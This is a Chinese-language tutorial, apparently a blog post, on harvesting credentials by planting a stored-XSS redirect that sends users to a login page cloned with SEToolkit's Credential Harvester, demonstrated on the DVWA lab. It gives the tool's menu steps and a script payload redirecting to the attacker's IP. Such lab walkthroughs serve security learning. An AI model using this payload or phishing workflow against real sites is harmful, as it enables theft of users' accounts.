一、盗取用户信息原理
首先克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆的登录页面,用户输入登录,账号和密码被存储。
1、用户登陆网站,我们实现利用网站的存储型xss漏洞,设置好跳转链接
2、当用户访问到XSS处,页面跳转到克隆的登陆界面
3、此时若用户进一步输入账号密码,那么我们的目的就达成了!
二、测试
2.1 克隆登陆网站
此处以dvwa登陆界面为例
下一步我们就需要克隆该站点:
这里需要用到kali下的setoolkit工具
SEToolkit使用流程:
- sudo setooklit (打开setookit工具)
- 选择Social-Engineering Attacks
- 选择Website Attack Vectors
- 选择Credential Harvester Attack Method
- 选择Site Cloner,输入要克隆的网址
输入网址那一步时,先回车,再输入我们想要克隆的站点链接
此时已经克隆完成!
浏览器访问kali的IP地址即可!
伪站点url:192.168.137.128也就是kali的ip地址
2.2 利用XSS漏洞盗取用户信息
构建payload,依旧以dvwa为例
在存储型xss漏洞处:
<script>window.location="http://192.168.137.128/"</script>
使网页重定向到我们的伪站点
直接跳转到了我们自己克隆的站点了
输入用户名和密码后不会有反应,回到kali可以发现用户名和密码
参考链接:
https://blog.youkuaiyun.com/qq_45884195/article/details/107136606